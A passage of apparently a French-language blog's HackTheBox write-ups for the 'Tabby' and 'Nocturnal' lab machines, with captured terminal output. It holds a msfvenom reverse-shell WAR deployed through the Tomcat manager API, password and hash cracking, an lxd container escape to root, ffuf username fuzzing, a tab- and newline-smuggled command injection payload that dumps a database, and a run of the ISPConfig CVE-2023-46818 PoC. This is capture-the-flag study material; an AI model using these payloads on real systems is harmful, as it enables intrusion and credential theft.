roles=\u0026#34;role1\u0026#34;/\u0026gt; --\u0026gt; \u0026lt;role rolename=\u0026#34;admin-gui\u0026#34;/\u0026gt; \u0026lt;role rolename=\u0026#34;manager-script\u0026#34;/\u0026gt; \u0026lt;user username=\u0026#34;tomcat\u0026#34; password=\u0026#34;$3cureP4s5w0rd123!\u0026#34; roles=\u0026#34;admin-gui,manager-script\u0026#34;/\u0026gt; \u0026lt;/tomcat-users\u0026gt; Upload War file On comprend que le role manager-script nous permet d\u0026rsquo;utiliser l\u0026rsquo;API tomcat pour pouvoir upload un shell. Habituellement on aurait plus utiliser la GUI pour le faire, mais il nous manquer le role manager-gui ! On peut tout de meme le faire donc avec manager-script mais uniquement avec l\u0026rsquo;API, ce qu\u0026rsquo;on fait ici avec un curl :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 ~/github/Hacking/HackTheBox/Machines/Linux/Easy/Tabby (main*) » msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.10 LPORT=1337 -f war -o shell.war Payload size: 13027 bytes Final size of war file: 13027 bytes Saved as: shell.war ~/github/Hacking/HackTheBox/Machines/Linux/Easy/Tabby (main*) » curl -X PUT -u \u0026#39;tomcat:$3cureP4s5w0rd123!\u0026#39; --upload-file shell.war \u0026#39;http://megahosting.htb:8080/manager/text/deploy?path=/shell\u0026amp;update=true\u0026#39; OK - Deployed application at context path [/shell] --------------------------- ~ » nc -lnvp 1337 listening on [any] 1337 ... connect to [10.10.14.10] from (UNKNOWN) [10.10.10.194] 46720 whoami tomcat Ash backup file - user flag 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 » cat linpeas.out | grep ash | tail ... -rw-r--r-- 1 ash ash 8716 Jun 16 2020 /var/www/html/files/16162020_backup.zip \u0026lt;--------- HERE ... -rw-r--r-- 1 root root 220 Feb 25 2020 /snap/core20/1081/etc/skel/.bash_logout -rw-r--r-- 1 root root 220 Feb 25 2020 /etc/skel/.bash_logout -rw-r--r-- 1 tomcat tomcat 220 Feb 25 2020 /opt/tomcat/.bash_logout # Sur kali $ zip2john 16162020_backup.zip \u0026gt; hash.txt $ john --format=PKZIP hash.txt --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) Will run 12 OpenMP threads Press \u0026#39;q\u0026#39; or Ctrl-C to abort, almost any other key for status admin@it (16162020_backup.zip) 1g 0:00:00:01 DONE (2025-05-05 19:03) 0.9615g/s 9972Kp/s 9972Kc/s 9972KC/s adzlogan..adamsapple:)1 Use the \u0026#34;--show\u0026#34; option to display all of the cracked passwords reliably Session completed. On peut utiliser ce mot de passe pour elever nos privilèges vers l\u0026rsquo;utilisateur ash:\n1 2 3 4 5 6 7 8 tomcat@tabby:/home$ tomcat@tabby:/home$ su ash Password: admin@it ash@tabby:/home$ whoami ash ash@tabby:/home$ cd ash/ ash@tabby:~$ cat user.txt fb78.....79f6 Ash - SSH connexion 1 2 3 4 5 6 7 8 9 10 11 12 13 ash@tabby:~/.ssh$ ssh-keygen ... ash@tabby:~/.ssh$ ls authorized_keys id_rsa id_rsa.pub ---------------------- » ssh ash@10.10.10.194 -i ash.key # \u0026lt;-- avec la clé privée Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-31-generic x86_64) ..... Last login: Tue May 19 11:48:00 2020 ash@tabby:~$ Privilege Escalation Enumeration On remarque de ash fait parti du groupe lxd et que lxd tourne sur la machine. ChatGPT m\u0026rsquo;a indiqué la possibilité d\u0026rsquo;une exploit avec lxd.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 ════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════ ╚════════════════════════════════════════════════╝ ╔══════════╣ Running processes (cleaned) ╚ Check weird \u0026amp; unexpected proceses run by root: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes root 81608 0.0 0.0 2488 588 ? S 17:18 0:00 _ bpfilter_umh root 1 0.0 0.5 104124 11460 ? Ss 11:11 0:01 /sbin/init maybe-ubiquity root 510 0.0 1.8 92596 37716 ? S\u0026lt;s 11:11 0:03 /lib/systemd/systemd-journald root 537 0.0 0.2 21748 5884 ? Ss 11:11 0:00 /lib/systemd/systemd-udevd root 677 0.0 0.9 411432 18380 ? SLsl 11:11 0:05 /sbin/multipathd -d -s systemd+ 711 0.0 0.6 24312 13280 ? Ss 11:11 0:01 /lib/systemd/systemd-resolved systemd+ 712 0.0 0.3 90388 6392 ? Ssl 11:11 0:01 /lib/systemd/systemd-timesyncd └─(Caps) 0x0000000002000000=cap_sys_time root 722 0.0 0.5 47524 10376 ? Ss 11:11 0:00 /usr/bin/VGAuthService root 723 0.0 0.3 162004 7860 ? S\u0026lt;sl 11:11 0:12 /usr/bin/vmtoolsd root 847 0.0 0.3 235548 7296 ? Ssl 11:11 0:00 /usr/lib/accountsservice/accounts-daemon message+ 848 0.0 0.2 7512 4604 ? Ss 11:11 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only └─(Caps) 0x0000000020000000=cap_audit_write root 854 0.0 0.1 81944 3748 ? Ssl 11:11 0:00 /usr/sbin/irqbalance --foreground syslog 856 0.0 0.2 224324 5344 ? Ssl 11:11 0:00 /usr/sbin/rsyslogd -n -iNONE root 857 0.0 1.6 926232 33124 ? Ssl 11:11 0:02 /usr/lib/snapd/snapd root 858 0.0 0.3 16864 7808 ? Ss 11:11 0:00 /lib/systemd/systemd-logind root 895 0.0 0.1 6812 2992 ? Ss 11:11 0:00 /usr/sbin/cron -f daemon[0m 934 0.0 0.1 3792 2280 ? Ss 11:11 0:00 /usr/sbin/atd -f ash 78178 0.0 0.2 13896 5412 ? S 17:15 0:00 _ sshd: ash@pts/2 ash 78181 0.0 0.2 8544 5464 pts/2 Ss+ 17:15 0:00 _ -bash ash 78265 0.0 0.5 24760 11216 pts/2 S 17:18 0:00 _ curl http://10.10.14.21/linpeas.sh ash 78266 0.6 0.2 9260 5984 pts/2 S 17:18 0:00 _ bash ash 81771 0.0 0.1 9260 4068 pts/2 S 17:18 0:00 _ bash ash 81775 0.0 0.1 9208 3636 pts/2 R 17:18 0:00 | _ ps fauxwww ash 81773 0.0 0.1 9260 2776 pts/2 R 17:18 0:00 _ bash ash 81774 0.0 0.1 9260 2776 pts/2 S 17:18 0:00 _ bash root 956 0.0 0.0 5828 1852 tty1 Ss+ 11:11 0:00 /sbin/agetty -o -p -- u --noclear tty1 linux tomcat 960 0.1 8.6 3094604 175680 ? Ssl 11:11 0:38 /usr/lib/jvm/default-java/bin/java -Djava.util.logging.config.file=/var/lib/tomcat9/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.awt.headless=true -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Dignore.endorsed.dirs= -classpath /usr/share/tomcat9/bin/bootstrap.jar:/usr/share/tomcat9/bin/tomcat-juli.jar -Dcatalina.base=/var/lib/tomcat9 -Dcatalina.home=/usr/share/tomcat9 -Djava.io.tmpdir=/tmp org.apache.catalina.startup.Bootstrap start └─(Caps) 0x0000000000000400=cap_net_bind_service tomcat 1399 0.0 0.0 2608 600 ? S 11:17 0:00 _ /bin/sh └─(Caps) 0x0000000000000400=cap_net_bind_service tomcat 1419 0.0 0.4 15968 10104 ? S 11:18 0:00 | _ python3 -c import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;) └─(Caps) 0x0000000000000400=cap_net_bind_service tomcat 1420 0.0 0.2 8568 5608 pts/0 Ss+ 11:18 0:00 | _ /bin/bash └─(Caps) 0x0000000000000400=cap_net_bind_service tomcat 77260 0.0 0.0 2608 608 ? S 16:55 0:00 _ /bin/sh └─(Caps) 0x0000000000000400=cap_net_bind_service tomcat 77273 0.0 0.4 15708 9796 ? S 16:55 0:00 _ python3 -c import pty;pty.spawn(\u0026#39;/bin/bash\u0026#39;) └─(Caps) 0x0000000000000400=cap_net_bind_service tomcat 77274 0.0 0.2 8436 5452 pts/1 Ss 16:55 0:00 _ /bin/bash └─(Caps) 0x0000000000000400=cap_net_bind_service root 77714 0.0 0.2 8776 4196 pts/1 S 17:07 0:00 _ su ash ash 77738 0.0 0.2 8312 5352 pts/1 S+ 17:07 0:00 _ bash root 973 0.0 0.8 193420 17916 ? Ss 11:11 0:00 /usr/sbin/apache2 -k start www-data 990 0.0 0.4 193888 9792 ? S 11:11 0:00 _ /usr/sbin/apache2 -k start www-data 993 0.0 0.4 193872 9776 ? S 11:11 0:00 _ /usr/sbin/apache2 -k start www-data 1252 0.0 0.6 193872 12308 ? S 11:12 0:00 _ /usr/sbin/apache2 -k start www-data 1254 0.0 0.6 193888 13444 ? S 11:12 0:00 _ /usr/sbin/apache2 -k start www-data 1255 0.0 0.4 193864 9740 ? S 11:12 0:00 _ /usr/sbin/apache2 -k start www-data 1256 0.0 0.4 193872 9764 ? S 11:12 0:00 _ /usr/sbin/apache2 -k start www-data 1257 0.0 0.4 193888 9788 ? S 11:12 0:00 _ /usr/sbin/apache2 -k start www-data 1258 0.0 0.4 193888 9776 ? S 11:12 0:00 _ /usr/sbin/apache2 -k start www-data 35324 0.0 0.4 193856 9632 ? S 11:39 0:00 _ /usr/sbin/apache2 -k start www-data 35326 0.0 0.3 193824 7816 ? S 11:39 0:00 _ /usr/sbin/apache2 -k start root 983 0.0 0.3 232700 6908 ? Ssl 11:11 0:00 /usr/lib/policykit-1/polkitd --no-debug ash 77728 0.0 0.4 18672 10004 ? Ss 17:07 0:00 /lib/systemd/systemd --user ash 77732 0.0 0.1 105464 3480 ? S 17:07 0:00 _ (sd-pam) ash 81372 0.0 0.1 7084 3992 ? Ss 17:18 0:00 _ /usr/bin/dbus-daemon[0m --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only root 81391 0.3 0.0 2616 1936 ? Ss 17:18 0:00 /bin/sh /snap/lxd/21468/commands/daemon.start root 81570 1.1 2.6 1458640 53604 ? Sl 17:18 0:00 _ lxd --logfile /var/snap/lxd/common/lxd/logs/lxd.log --group lxd root 81557 0.0 0.0 85608 2016 ? Sl 17:18 0:00 lxcfs /var/snap/lxd/common/var/lib/lxcfs -p /var/snap/lxd/common/lxcfs.pid ╔══════════╣ Processes with credentials in memory (root req) ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#credentials-from-process-memory gdm-password Not Found gnome-keyring-daemon Not Found lightdm Not Found vsftpd Not Found apache2 process found (dump creds from memory as root) sshd: process found (dump creds from memory as root) ╔══════════╣ Processes whose PPID belongs to a different user (not root) ╚ You will know if a user can somehow spawn processes as a different user Proc 77714 with ppid 77274 is run by user root but the ppid user is tomcat ╔══════════╣ Files opened by processes belonging to other users ╚ This is usually empty because of the lack of privileges to read other user processes information ash@tabby:~$ groups ash ash : ash adm cdrom dip plugdev lxd lxd group privilege escalation - root flag On trouve un tutoriel pour exploiter lxd : https://amanisher.medium.com/lxd-privilege-escalation-in-linux-lxd-group-ec7cafe7af63 Ainsi qu\u0026rsquo;un github avec le container à cloner sur la machine : https://github.com/saghul/lxd-alpine-builder\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 ash@tabby:~$ cd lxd-alpine-builder/ ash@tabby:~/lxd-alpine-builder$ ls alpine-v3.13-x86_64-20210218_0139.tar.gz ash@tabby:~/lxd-alpine-builder$ lxc image import alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage Image imported with fingerprint: cd73881adaac667ca3529972c7b380af240a9e3b09730f8c8e4e6a23e1a7892b ash@tabby:~/lxd-alpine-builder$ lxc image list +---------+--------------+--------+-------------------------------+--------------+-----------+--------+-----------------------------+ | ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE | +---------+--------------+--------+-------------------------------+--------------+-----------+--------+-----------------------------+ | myimage | cd73881adaac | no | alpine v3.13 (20210218_01:39) | x86_64 | CONTAINER | 3.11MB | May 5, 2025 at 5:29pm (UTC) | +---------+--------------+--------+-------------------------------+--------------+-----------+--------+-----------------------------+ ash@tabby:~/lxd-alpine-builder$ lxc init myimage ignite -c security.privileged=true Creating ignite Error: No storage pool found. Please create a new storage pool ash@tabby:~/lxd-alpine-builder$ lxd init Would you like to use LXD clustering? (yes/no) [default=no]: Do you want to configure a new storage pool? (yes/no) [default=yes]: Name of the new storage pool [default=default]: Name of the storage backend to use (btrfs, dir, lvm, zfs, ceph) [default=zfs]: Create a new ZFS pool? (yes/no) [default=yes]: Would you like to use an existing empty block device (e.g. a disk or partition)? (yes/no) [default=no]: Size in GB of the new loop device (1GB minimum) [default=5GB]: Would you like to connect to a MAAS server? (yes/no) [default=no]: Would you like to create a new local network bridge? (yes/no) [default=yes]: What should the new bridge be called? [default=lxdbr0]: What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: Would you like the LXD server to be available over the network? (yes/no) [default=no]: Would you like stale cached images to be updated automatically? (yes/no) [default=yes] Would you like a YAML \u0026#34;lxd init\u0026#34; preseed to be printed? (yes/no) [default=no]: ash@tabby:~/lxd-alpine-builder$ lxc init myimage ignite -c security.privileged=true Creating ignite ash@tabby:~/lxd-alpine-builder$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true Device mydevice added to ignite ash@tabby:~/lxd-alpine-builder$ lxc start ignite ash@tabby:~/lxd-alpine-builder$ lxc exec ignite /bin/sh ~ # cd /mnt/root/ /mnt/root # ls bin cdrom etc lib lib64 lost+found mnt proc run snap sys usr boot dev home lib32 libx32 media opt root sbin srv tmp var /mnt/root # cd root /mnt/root/root # ls root.txt snap /mnt/root/root # cat root.txt 47a3.....74a4 Tips J\u0026rsquo;aurais dû mieux comprendre les roles et leur fonctionnement. Le role manager-script permet uniquement d\u0026rsquo;utiliser l\u0026rsquo;API de tomcat. J\u0026rsquo;aurais dû axé mes recherches sur les droits hérités de ce rôle pour mieux comprendre comment upload un reverse shell. ","date":"2025-05-05T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/tabby-htb/","title":"HTB | Tabby"},{"content":" Machine name OS IP Difficulty Nocturnal Linux 10.10.11.64 Easy Users 1 2 3 4 5 amanda : arHkG7HAI68X8s1J tobias : slowmotionapocalypse ## ISPConfig Dashboard admin : slowmotionapocalypse SystemInfo 1 Ubuntu 20.04.6 LTS (Focal Fossa) Enumeration 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 $ nmap -sC -sV -An -p- -vvv -T4 10.10.11.64 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 20:26:88:70:08:51:ee:de:3a:a6:20:41:87:96:25:17 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDpf3JJv7Vr55+A/O4p/l+TRCtst7lttqsZHEA42U5Edkqx/Kb8c+F0A4wMCVOMqwyR/PaMdmzAomYGvNYhi3NelwIEqdKKnL+5svrsStqb9XjyShPD9SQK5Su7xBt+/TfJyJFRcsl7ZJdfc6xnNHQITvwa6uZhLsicycj0yf1Mwdzy9hsc8KRY2fhzARBaPUFdG0xte2MkaGXCBuI0tMHsqJpkeZ46MQJbH5oh4zqg2J8KW+m1suAC5toA9kaLgRis8p/wSiLYtsfYyLkOt2U+E+FZs4i3vhVxb9Sjl9QuuhKaGKQN2aKc8ItrK8dxpUbXfHr1Y48HtUejBj+AleMrUMBXQtjzWheSe/dKeZyq8EuCAzeEKdKs4C7ZJITVxEe8toy7jRmBrsDe4oYcQU2J76cvNZomU9VlRv/lkxO6+158WtxqHGTzvaGIZXijIWj62ZrgTS6IpdjP3Yx7KX6bCxpZQ3+jyYN1IdppOzDYRGMjhq5ybD4eI437q6CSL20= | 256 4f:80:05:33:a6:d4:22:64:e9:ed:14:e3:12:bc:96:f1 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLcnMmaOpYYv5IoOYfwkaYqI9hP6MhgXCT9Cld1XLFLBhT+9SsJEpV6Ecv+d3A1mEOoFL4sbJlvrt2v5VoHcf4M= | 256 d9:88:1f:68:43:8e:d4:2a:52:fc:f0:66:d4:b9:ee:6b (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIASsDOOb+I4J4vIK5Kz0oHmXjwRJMHNJjXKXKsW0z/dy 80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://nocturnal.htb/ | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: nginx/1.18.0 (Ubuntu) Foothold File upload On trouve un site web, on peut s\u0026rsquo;inscrire et poster des fichiers. Avec beaucoup de recherche, je ne trouve pas de faille pour uploader un shell par exemple et executer du code php. Rien ne semble vulnérable.\nEn téléchargeant mes propres fichiers, et en analysant la requete effectué avec Burp. Je découvre qu\u0026rsquo;il est possible de vérifier si un utilisateur existe ou non. En plus, si il existe, et qu\u0026rsquo;on précise un mauvais fichier pour l\u0026rsquo;upload, il nous propose les autres fichiers disponibles pour cet utilisateur !\nDans un premier et j\u0026rsquo;ai fait une requete Burp. Lorsqu\u0026rsquo;un utilisateur est mauvais, j\u0026rsquo;ai vu que la taille de la requete était de 2985octets. Information importante pour pouvoir fuzzer ensuite les usernames. En effet, si la reponse a ma requete est différente de cette taille, alors il est probable que l\u0026rsquo;utilisateur existe.\nJe mets la requete a effectué pour fuzzer les noms d\u0026rsquo;utilisateur, avec le mot clé \u0026ldquo;FUZZ\u0026rdquo; au bon endroit :\n1 2 3 4 5 6 7 8 9 10 11 12 ~/github/Hacking/HackTheBox/Machines/Linux/Easy/Nocturnal (main*) » cat dl.req GET /view.php?username=FUZZ\u0026amp;file=a.pdf HTTP/1.1 Host: nocturnal.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: http://nocturnal.htb/dashboard.php Cookie: PHPSESSID=u9iupob4f8khh30retevlt8gc6 Upgrade-Insecure-Requests: 1 Priority: u=0, i J\u0026rsquo;utilise ensuite l\u0026rsquo;outil ffuf avec une liste de usernames de seclists. Je précise le parametre -fs 2985 qui affiche donc les utilisateurs uniquement si la reponse renvoyé a une taille différente de 2985. Pour faire \u0026ldquo;egale\u0026rdquo;, on aurait écrit \u0026ldquo;-ms\u0026rdquo; :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 ~/github/Hacking/HackTheBox/Machines/Linux/Easy/Nocturnal (main*) » ffuf -request dl.req -request-proto http -w /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt -fs 2985 /\u0026#39;___\\ /\u0026#39;___\\ /\u0026#39;___\\ /\\ \\__/ /\\ \\__/ __ __ /\\ \\__/ \\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\ \\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/ \\ \\_\\ \\ \\_\\ \\ \\____/ \\ \\_\\ \\/_/ \\/_/ \\/___/ \\/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://nocturnal.htb/view.php?username=FUZZ\u0026amp;file=a.pdf :: Wordlist : FUZZ: /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt :: Header : Accept-Encoding: gzip, deflate, br :: Header : Cookie: PHPSESSID=u9iupob4f8khh30retevlt8gc6 :: Header : Upgrade-Insecure-Requests: 1 :: Header : Priority: u=0, i :: Header : Host: nocturnal.htb :: Header : User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 :: Header : Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 :: Header : Connection: keep-alive :: Header : Referer: http://nocturnal.htb/dashboard.php :: Header : Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 :: Filter : Response size: 2985 ________________________________________________ admin [Status: 200, Size: 3037, Words: 1174, Lines: 129, Duration: 26ms] hello [Status: 200, Size: 3118, Words: 1175, Lines: 129, Duration: 21ms] amanda [Status: 200, Size: 3113, Words: 1175, Lines: 129, Duration: 20ms] tobias [Status: 200, Size: 3037, Words: 1174, Lines: 129, Duration: 19ms] On trouve plusieurs usernames, dont amanda qui est correct et contient un fichier privacy avec un mot de passe a l\u0026rsquo;interieur:\n1 2 3 4 5 6 7 8 9 10 11 12 13 GET /view.php?username=amanda\u0026amp;file=privacy.odt HTTP/1.1 Host: nocturnal.htb ... -------------- Dear Amanda, Nocturnal has set the following temporary password for you: arHkG7HAI68X8s1J. This password has been set for all our services, so it is essential that you change it on your first login to ensure the security of your account and our infrastructure. The file has been created and provided by Nocturnal\u0026#39;s IT team. If you have any questions or need additional assistance during the password change process, please do not hesitate to contact us. Remember that maintaining the security of your credentials is paramount to protecting your information and that of the company. We appreciate your prompt attention to this matter. Yours sincerely, Nocturnal\u0026#39;s IT team Amanda - Admin Dashboard On peut creer une backup des fichiers. On peut injecter des commandes dans le champs permettant de préciser le mot de passe du zip. L\u0026rsquo;idée est de bypasser le filtre qui interdit les espaces, \u0026lsquo;;\u0026rsquo; etc.. En utilisant \u0026ldquo;%09\u0026rdquo; on peut bypasser le filtre et mettre des espaces ! Attention a toujours tester ce genre de choses dans Burp !! En faisant directement dans la part\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 POST /admin.php HTTP/1.1 Host: nocturnal.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 95 Origin: http://nocturnal.htb Connection: keep-alive Referer: http://nocturnal.htb/admin.php Cookie: PHPSESSID=h28ba7dgkhrqt67c0ktleof1d1 Upgrade-Insecure-Requests: 1 Priority: u=0, i password=%0Abash%09-c%09\u0026#34;base64%09/var/www/nocturnal_database/nocturnal_database.db\u0026#34;%0A\u0026amp;backup= nocturnal.db On peut maintenant dumper la db et casser le hachage du mot de passe de :\n1 2 3 4 5 6 7 8 9 10 ~/github/Hacking/HackTheBox/Machines/Linux/Easy/Nocturnal (main*) » sqlite3 ~/Téléchargements/download.sqlite SQLite version 3.46.1 2024-08-13 09:16:08 Enter \u0026#34;.help\u0026#34; for usage hints. sqlite\u0026gt; .tables uploads users sqlite\u0026gt; select * from users; 1|admin|d725aeba143f575736b07e045d8ceebb 2|amanda|df8b20aa0c935023f99ea58358fb63c4 4|tobias|55c82b1ccd55ab219b3b109b07d5061d 6|test|098f6bcd4621d373cade4e832627b4f6 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 ~/github/Hacking/HackTheBox/Machines/Linux/Easy/Nocturnal (main*) » hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt hashcat (v6.2.6) starting ... Dictionary cache built: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344392 * Bytes.....: 139921507 * Keyspace..: 14344385 * Runtime...: 2 secs 55c82b1ccd55ab219b3b109b07d5061d:slowmotionapocalypse Session..........: hashcat Status...........: Cracked Hash.Mode........: 0 (MD5) Hash.Target......: 55c82b1ccd55ab219b3b109b07d5061d Time.Started.....: Wed Apr 16 14:57:40 2025 (1 sec) Time.Estimated...: Wed Apr 16 14:57:41 2025 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 12149.4 kH/s (4.50ms) @ Accel:2048 Loops:1 Thr:32 Vec:1 Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new) Progress.........: 4128768/14344385 (28.78%) Rejected.........: 0/4128768 (0.00%) Restore.Point....: 3538944/14344385 (24.67%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator Candidates.#1....: stefy06 -\u0026gt; ruddsound1 Hardware.Mon.#1..: Temp: 35c Fan: 46% Util: 29% Core:1544MHz Mem:3802MHz Bus:16 Started: Wed Apr 16 14:57:29 2025 Stopped: Wed Apr 16 14:57:42 2025 ~/github/Hacking/HackTheBox/Machines/Linux/Easy/Nocturnal (main*) » hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt --show 55c82b1ccd55ab219b3b109b07d5061d:slowmotionapocalypse 1 2 3 4 5 6 7 8 9 10 ~/github/Hacking/HackTheBox/Machines/Linux/Easy/Nocturnal (main*) » ssh -L 8888:localhost:8080 tobias@nocturnal.htb tobias@nocturnal.htb\u0026#39;s password: Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-212-generic x86_64) ... Last login: Wed Apr 16 12:59:25 2025 from 10.10.14.10 tobias@nocturnal:~$ ls user.txt tobias@nocturnal:~$ cat user.txt 7922.....0dd3 Privilege Escalation netstat -ano - port forwarding 8080 On découvre un port 8080 ouvert uniquement de l\u0026rsquo;interieur. On decide de faire du port forwarding pour voir la page web sur notre navigateur:\n1 ssh -L 8888:localhost:8080 tobias@nocturnal.htb ISPConfig 3.2.10p1 On découvre une page web \u0026ldquo;ISPConfig\u0026rdquo; On peut se connecter au compte \u0026ldquo;admin\u0026rdquo; avec le mot de passe de tobias \u0026ldquo;slowmotionapocalypse\u0026rdquo;. On trouve un dashboard et on identifie la version \u0026ldquo;3.2.10p1\u0026rdquo;.\nExploit : Authenticated RCE ISPConfig Avec searchsploit, on ne trouve que d\u0026rsquo;anciennes vulnérabilités. Cependant, sur google on trouve un lien vers un POC qui semble plus récent : https://packetstorm.news/files/id/176126\n\u0026ldquo;ISPConfig versions 3.2.11 and below suffer from a PHP code injection vulnerability in language_edit.php.\u0026rdquo;\nOn observe ici le parametre \u0026ldquo;lang_file\u0026rdquo; qui est injectable.\n1 2 curl_setopt($ch, CURLOPT_URL, \u0026#34;{$url}admin/language_edit.php\u0026#34;); curl_setopt($ch, CURLOPT_POSTFIELDS, \u0026#34;lang=en\u0026amp;module=help\u0026amp;lang_file={$lang_file}\u0026#34;); En utilisant le POC, et les credentials admin, on obtient directement un shell en tant que root :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 » php exploit.php http://localhost:8888/ admin slowmotionapocalypse ------------------------------------------------------------------------ ISPConfig \u0026lt;= 3.2.11 (language_edit.php) PHP Code Injection Vulnerability ------------------------------------------------------------------------ [-] Software Link: https://www.ispconfig.org [-] Affected Versions: Version 3.2.11 and prior versions. [-] Vulnerabilities Description: User input passed through the \u0026#34;records\u0026#34; POST parameter to /admin/language_edit.php is not properly sanitized before being used to dynamically generate PHP code that will be executed by the application. This can be exploited by malicious administrator users to inject and execute arbitrary PHP code on the web server. [-] Proof of Concept: https://karmainsecurity.com/pocs/CVE-2023-46818.php (Packet Storm Editor Note: See bottom of this file for PoC) [-] Solution: Upgrade to version 3.2.11p1 or later. [-] Disclosure Timeline: [25/10/2023] - Vendor notified [26/10/2023] - Version 3.2.11p1 released [27/10/2023] - CVE identifier assigned [07/12/2023] - Publication of this advisory [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2023-46818 to this vulnerability. [-] Credits: Vulnerability discovered by Egidio Romano. [-] Original Advisory: https://karmainsecurity.com/KIS-2023-13 [-] Other References: https://www.ispconfig.org/blog/ispconfig-3-2-11p1-released/ --- CVE-2023-46818.php PoC --- [+] Logging in with username \u0026#39;admin\u0026#39; and password \u0026#39;slowmotionapocalypse\u0026#39; [+] Injecting shell [+] Launching shell ispconfig-shell# whoami root ispconfig-shell# cat /root/root.txt 9b18.....21bf Tips J\u0026rsquo;ai découvert qu\u0026rsquo;on pouvait vérifier facilement si un utilisateur existait en faisant une requete specifique. J\u0026rsquo;ai meme pensé à faire un Fuzz, eventuellement avec Burp Sniper ou un autre outil. Je n\u0026rsquo;ai pas essayé et je suis aller voir le write up\u0026hellip; C\u0026rsquo;était bien ça la solution\u0026hellip;\nLorsqu\u0026rsquo;on trouve une entrée utilisateur injectable, toujours faire des tests dans BURP !! Ou avec curl (à la rigueur). Mais jamais directement sur la page web. Ici, il fallait utilisé %0a pour 